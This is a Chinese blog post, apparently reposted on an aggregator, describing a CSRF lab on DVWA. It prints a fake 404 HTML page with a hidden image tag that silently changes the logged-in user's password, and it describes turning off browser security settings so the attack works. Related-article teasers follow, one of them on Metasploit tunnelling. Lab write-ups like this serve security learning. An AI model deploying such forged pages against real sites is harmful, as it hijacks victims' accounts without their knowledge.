【渗透测试】|基于dvwa的CSRF初级，中级，高级

【渗透测试】|基于dvwa的CSRF初级，中级，高级

news2024/10/5 22:23:28

一、渗透测试

二、渗透测试过程中遇到的问题和解决
在初级csrf中，想要通过伪造一个404页面，达到修改密码的效果
伪造404页面的html代码如下：

<html>
<head>
</head>
<body>
<img src="http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#" border='0' style="display:none;"/>
<h1>404<h1>
<h2>file not foundww.<h2>
</body>
</html>

通过打开这个html，页面出现了404，但是密码并没有更改成功

直接通过http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#，密码是可以更改成功的。

解决：关闭浏览器的一些安全设置，火狐浏览器如图:
在这里插入图片描述
解决过程：
通过html打开404页面时，发现cookie的secutiry 为 impossible，而直接在dvwa中修改密码的cookie的secutiry 为 low，两者的phpsessid也不一样，各种查资料，发现可能的浏览器的安全设置导致的。。。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1711350.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

python PyQt5 数字时钟程序

python PyQt5 数字时钟程序

效果图： 概述本文档将指导您如何使用Python的PyQt5库创建一个简单的时钟程序。该程序将显示当前时间，并具有以下特性： 始终在最前台显示。窗口可拖动。鼠标右键点击窗口可弹出退出菜单。时间标签具有红色渐变效果。窗口初始化时出现在屏幕…

阅读更多...

解析智慧物流园区系统的多方位优势

解析智慧物流园区系统的多方位优势

智慧物流园区系统是基于物联网、大数据、人工智能等先进技术的应用系统，旨在实现物流园区的高效、智能化管理。随着物流行业的快速发展，传统物流园区已经无法满足日益增长的需求。智慧物流园区系统的出现填补了现有物流园区管理的空白，带来了…

阅读更多...

Windows11系统安装QEMU虚拟化软件

Windows11系统安装QEMU虚拟化软件

Windows11系统安装QEMU虚拟化软件 QEMU软件是一个通用的开源机器模拟器和虚拟机。本文档适用于在Windows 11系统平台上安装QEMU软件。 1. 安装准备 1.1 安装平台 Windows 11 1.2. 软件信息软件名称软件版本安装路径QEMUQEMU-8.2.93D:\qemu 1.3软件下载 QEMU官网官网下…

阅读更多...

AI办公自动化：kimi批量新建文件夹

AI办公自动化：kimi批量新建文件夹

工作任务：批量新建多个文件夹，每个文件夹中的年份不一样在kimi中输入提示词： 你是一个Python编程专家，要完成一个编写关于录制电脑上的键盘和鼠标操作的Python脚本的任务，具体步骤如下： 打开文件夹&…

阅读更多...

【鸟叔的Linux私房菜】2-主机规划与磁盘分区

【鸟叔的Linux私房菜】2-主机规划与磁盘分区

文章目录 2.1 Linux与硬件的搭配各硬件设备在Linux的文件名使用虚拟机学习 2.2 磁盘分区磁盘连接方式和设备文件名的关系MBR(MS-DOS)与GPT磁盘分区表MBR(MS-DOS)GPT磁盘分区表启动流程的BIOS与UEFI启动检测程序BIOS搭配MBR/GPT的启动流程UEFI BIOS搭配 GPT启动的流程 Linux安装…

阅读更多...

解决SSH客户端远程连接CentOS7虚拟机时加载过慢问题

解决SSH客户端远程连接CentOS7虚拟机时加载过慢问题

1、编辑 /etc/ssh/sshd_config 文件，将 useDNS 中的 yes 改为 no ，关闭UseDNS加速： vi /etc/ssh/sshd_config2、重启ssh服务: systemctl restart sshd

阅读更多...

构建php环境、安装、依赖、nginx配置、ab压力测试命令、添加php-fpm为系统服务

构建php环境、安装、依赖、nginx配置、ab压力测试命令、添加php-fpm为系统服务

目录 php简介官网php安装包选择下载稳定版本 （建议使用此版本，文章以此版本为例） 安装php解析环境准备工作安装依赖 zlib-devel 和 libxml2-devel包。安装扩展工具库安装 libmcrypt 安装 mhash 安装mcrypt 安装php 选项含…

阅读更多...

【Linux】22. 线程控制

【Linux】22. 线程控制

Linux线程控制 POSIX线程库与线程有关的函数构成了一个完整的系列，绝大多数函数的名字都是以“pthread_”打头的要使用这些函数库，要通过引入头文<pthread.h> 链接这些线程函数库时要使用编译器命令的“-lpthread”选项线程创建 pthread_cr…

阅读更多...

成都爱尔眼科蔡裕主任解说什么是近视性黄斑病变

成都爱尔眼科蔡裕主任解说什么是近视性黄斑病变

近视性黄斑病变，属于黄斑病变的其中一种。黄斑是眼内一个部位，它位于眼底的后极部，视网膜的中心部，管理着光、形、色。黄斑变性是指由于年龄、遗传、不良环境、慢性光损伤等各种因素的影响，使眼部视网膜处的黄斑发生…

阅读更多...

kafka-主题创建（主题操作的命令）

kafka-主题创建（主题操作的命令）

文章目录 1、topic主题操作的命令1.1、创建一个3分区1副本的主题1.1.1、获取 kafka-topics.sh 的帮助信息1.1.2、副本因子设置不能超过集群中broker的数量1.1.3、创建一个3分区1副本的主题1.1.4、查看所有主题1.1.5、查看主题详细描述 1、topic主题操作的命令 kafka发送消息会存…

阅读更多...

彩光赋能中国智造极简光3.X助力“数智”转型

彩光赋能中国智造极简光3.X助力“数智”转型

蒸汽时代、电气时代、信息时代三大工业革命后互联网和智能制造主导的工业4.0时代来临大数据、云计算、人工智能等新兴技术对企业园区的网络架构、负载能力等提出了新要求,也使得光纤较于传统铜缆在距离、性能、延时上的优势日益凸显基于此围绕未来园区网建设的企…

阅读更多...

【NumPy】深入了解NumPy的multiply函数：高效矩阵和数组乘法指南

【NumPy】深入了解NumPy的multiply函数：高效矩阵和数组乘法指南

🧑 博主简介：阿里巴巴嵌入式技术专家，深耕嵌入式人工智能领域，具备多年的嵌入式硬件产品研发管理经验。 📒 博客介绍：分享嵌入式开发领域的相关知识、经验、思考和感悟，欢迎关注。提供嵌入式方向…

阅读更多...

positivessl泛域名证书500元13个月

positivessl泛域名证书500元13个月

随着创建网站的门槛变低，不论是个人用户还是企事业单位用户创建的域名网站也越来越多，怎么维护网络环境的安全成为了各个用户需要解决的问题。为了保护网站的数据安全，防止恶意攻击和数据泄露，大多数用户选择为域名网站安装数字证…

阅读更多...

基于51单片机的直流电机调速设计

基于51单片机的直流电机调速设计

一.硬件方案本系统采用STC89C51控制输出数据，由单片机IO口产生PWM信号，送到直流电机，直流电机通过测速电路将实时转速送回单片机，进行转速显示，从而实现对电机速度和转向的控制，达到直流电机调速的目的。…

阅读更多...

excel 点击单元格的内容跳转到其他sheet设置

excel 点击单元格的内容跳转到其他sheet设置

如图点击1处跳转到2 按照如下图步骤操作即可

阅读更多...

【机器学习聚类算法实战-5】机器学习聚类算法之DBSCAN聚类、K均值聚类算法、分层聚类和不同度量的聚集聚类实例分析

【机器学习聚类算法实战-5】机器学习聚类算法之DBSCAN聚类、K均值聚类算法、分层聚类和不同度量的聚集聚类实例分析

🎩 欢迎来到技术探索的奇幻世界👨‍💻 📜 个人主页：一伦明悦-CSDN博客 ✍🏻 作者简介： C软件开发、Python机器学习爱好者 🗣️ 互动与支持：💬评论 &…

阅读更多...

补环境——A股市场

补环境——A股市场

补环境吐环境 1.Proxy对象 Proxy对象由两个部分组成：target、handler target:目标对象 handler：是一个对象，声明了代理target的指定行为，支持的拦截操作，一共13种： get(target,propKey,receiver)&…

阅读更多...

DataGrip使用ssh连接数据库的操作流程

DataGrip使用ssh连接数据库的操作流程

1 选择数据源种类 2 配置ssh 3 填写host、port和认证方式我选择的密码方式，也可选择其他方式连接： 本文由博客一文多发平台 OpenWrite 发布！

阅读更多...

内网安全--隧道技术-MSF上线本地

内网安全--隧道技术-MSF上线本地

免责声明:本文仅做技术交流与学习... 不得不说,小白最近也是用上了viper,这里要特别感谢一下my bro 北岭敲键盘的荒漠猫 MSF--viper: --生成马子-->上线 --进入meterpreter. 1-查看路由,添加路由. 查看路由信息 : run autoroute -p run post/multi/manage/autoroute 添加…

阅读更多...

PostgreSQL发展史

PostgreSQL发展史

PostgreSQL是一个开源的对象-关系型数据库管理系统（ORDBMS），其历史可以追溯到上世纪80年代。以下是对PostgreSQL发展史的深入解析： 1980年代：起源 1.Ingres 项目 1977年，Michael Stonebraker 和他的团队…

阅读更多...

推荐文章

最新文章